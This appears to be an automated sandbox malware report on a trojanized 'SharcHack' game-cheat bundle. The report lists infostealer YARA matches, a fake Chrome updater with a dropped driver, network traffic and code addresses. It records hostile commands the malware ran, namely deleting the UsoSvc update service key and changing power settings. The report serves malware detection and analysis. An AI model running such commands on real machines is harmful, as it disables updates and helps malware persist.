Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.razer.com/legal/customer-privacy-policy
Source: CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.remobjects.com/ps
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.sqlite.org/copyright.html2
Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/lang
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/lang_c
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: https://www.sqlite.org/lang_corefunc.html

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943

Source: unknown	HTTPS traffic detected: 172.67.160.84:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49951 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4F4E51 GetAsyncKeyState,GetAsyncKeyState,SendMessageW,

8_2_6B4F4E51

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4EFB99 SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,MessageBeep,

8_2_6B4EFB99

E-Banking Fraud

Yara detected BlackGuard

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detect the Lighting infostealer based on specific strings Author: Sekoia.io
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Detect the Lighting infostealer based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: Detects A310Logger Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\3.exe

Code function: 2_2_00007FF69AF14FE0 NtCreateUserProcess,

2_2_00007FF69AF14FE0

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\cfoutowi.tmp

Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF11880	2_2_00007FF69AF11880
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF131E0	2_2_00007FF69AF131E0
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF19290	2_2_00007FF69AF19290
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF13AF0	2_2_00007FF69AF13AF0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_05996B97	7_2_05996B97
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_05E32974	7_2_05E32974
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC85D80	7_2_6BC85D80
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC4EBD0	7_2_6BC4EBD0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCB1B80	7_2_6BCB1B80
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC01B10	7_2_6BC01B10
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCC3A90	7_2_6BCC3A90
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE2AD0	7_2_6BBE2AD0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCADA50	7_2_6BCADA50
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC36A70	7_2_6BC36A70
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBF6930	7_2_6BBF6930
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC3D800	7_2_6BC3D800
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBF4870	7_2_6BBF4870
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBD8FEE	7_2_6BBD8FEE
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC13FA0	7_2_6BC13FA0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCAFE40	7_2_6BCAFE40
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE0E77	7_2_6BBE0E77
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC16DD0	7_2_6BC16DD0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC07D70	7_2_6BC07D70
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBDFCF9	7_2_6BBDFCF9
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC37C90	7_2_6BC37C90
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCC6C50	7_2_6BCC6C50
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC7F3A0	7_2_6BC7F3A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC91340	7_2_6BC91340
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC1E350	7_2_6BC1E350
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE7340	7_2_6BBE7340
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC46260	7_2_6BC46260
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE024A	7_2_6BBE024A
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBEB180	7_2_6BBEB180
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBEC1C0	7_2_6BBEC1C0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCC7150	7_2_6BCC7150
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCB2100	7_2_6BCB2100
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC8C0C0	7_2_6BC8C0C0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBF50A0	7_2_6BBF50A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBEB050	7_2_6BBEB050
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC0D7C0	7_2_6BC0D7C0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE079B	7_2_6BBE079B
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC53760	7_2_6BC53760
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBF46F0	7_2_6BBF46F0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC786A0	7_2_6BC786A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC0A5F0	7_2_6BC0A5F0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBD4589	7_2_6BBD4589
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBDB5D1	7_2_6BBDB5D1
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC975B0	7_2_6BC975B0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC00550	7_2_6BC00550
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBEA4A0	7_2_6BBEA4A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE2491	7_2_6BBE2491
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCA04A0	7_2_6BCA04A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBE7440	7_2_6BBE7440
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_012EE1E8	7_2_012EE1E8
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052B04C8	7_2_052B04C8
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052B81A0	7_2_052B81A0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052BF26C	7_2_052BF26C
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052BCF8A	7_2_052BCF8A
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052BF9E0	7_2_052BF9E0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052BE577	7_2_052BE577
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052B84CB	7_2_052B84CB
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_052B818F	7_2_052B818F
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B502BC4	8_2_6B502BC4
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B609A88	8_2_6B609A88
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B622F25	8_2_6B622F25
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B60FF90	8_2_6B60FF90
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B4F6E98	8_2_6B4F6E98
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B530DDA	8_2_6B530DDA
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B4CA728	8_2_6B4CA728
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B4E660E	8_2_6B4E660E
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B620599	8_2_6B620599
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B6244A4	8_2_6B6244A4

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: String function: 6BC4FC90 appears 164 times
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: String function: 6BC29320 appears 113 times
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: String function: 6B600C5F appears 89 times
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: String function: 6B600D40 appears 64 times

Source: SharcHack.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Source: SharcHack.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SharcHack.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows

Source: 3.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.2.dr	Static PE information: Number of sections : 11 > 10

Source: SharcHack.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_lighting author = Sekoia.io, description = Detect the Lighting infostealer based on specific strings, creation_date = 2022-04-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/04/05/inside-lightning-stealer/, id = 3c160c16-f417-4fa2-aa44-fb7b981fb2b3
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: infostealer_win_lighting author = Sekoia.io, description = Detect the Lighting infostealer based on specific strings, creation_date = 2022-04-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/04/05/inside-lightning-stealer/, id = 3c160c16-f417-4fa2-aa44-fb7b981fb2b3
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Key value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon version			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Key value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon version			Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@113/99@12/8

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4C3BF0 IsModuleLoaded2,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,

8_2_6B4C3BF0

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4D72C8 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,

8_2_6B4D72C8

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4C6180 FindResourceW,LoadResource,LockResource,SizeofResource,

8_2_6B4C6180

Source: C:\Users\user\AppData\Local\Temp\3.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\v2.exe

File created: C:\Users\user\AppData\Roaming\PyFDX932923.user

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Mutant created: \Sessions\1\BaseNamedObjects\{9bad0be7-37a7-44b5-940f-7c5abae5b463}Installer
